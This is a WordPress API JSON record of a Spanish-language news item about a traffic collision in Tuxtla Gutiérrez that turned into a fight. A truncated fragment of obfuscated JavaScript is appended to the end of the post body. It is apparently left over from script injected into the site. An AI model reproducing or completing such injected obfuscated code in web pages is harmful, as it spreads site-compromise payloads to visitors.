{"id":1131,"date":"2022-04-07T00:01:19","date_gmt":"2022-04-07T00:01:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1131"},"modified":"2022-04-07T00:01:21","modified_gmt":"2022-04-07T00:01:21","slug":"en-bronca-termina-accidente-de-transito-en-la-bienestar-social","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1131","title":{"rendered":"En &#8220;bronca&#8221; termina accidente de tr\u00e1nsito en la Bienestar Social"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"752\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220406-WA0018-1024x752.jpg\" alt=\"\" class=\"wp-image-1132\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220406-WA0018-1024x752.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220406-WA0018-300x220.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220406-WA0018-768x564.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220406-WA0018.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 6 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; En ri\u00f1a termin\u00f3 un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles cerca de las 11 de la ma\u00f1ana en la Calzada Pensil y Avenida Francisco I Madero de la Colonia Bienestar Social de Tuxtla.<\/p>\n\n\n\n<p>El reporte de tr\u00e1nsito inform\u00f3 que, los involucrados fueron la conductora de un Buick Verano de color gris el cual fue impactado por un Jetta de color negro que presuntamente se pas\u00f3 la preferencia.<\/p>\n\n\n\n<p>Tras la colisi\u00f3n el conductor del Jetta intent\u00f3 escapar pero fue alcanzado por los ocupantes del Buick y golpeado.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito, de la Polic\u00eda y de la Cruz Roja que atendieron al herido.<\/p>\n\n\n\n<p>El presunto agresor, fue trasladado a los separos municipales y las unidades puestas a disposici\u00f3n del Ministerio p\u00fablico en turno para aclarar lo sucedido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 6 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; En ri\u00f1a termin\u00f3 un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles cerca de las 11 de la ma\u00f1ana en la Calzada Pensil y Avenida Francisco I Madero de la Colonia Bienestar Social de Tuxtla. El reporte de tr\u00e1nsito inform\u00f3 que, los involucrados fueron la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1132,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1131","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1131","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1131"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1131\/revisions"}],"predecessor-version":[{"id":1133,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1131\/revisions\/1133"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1132"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}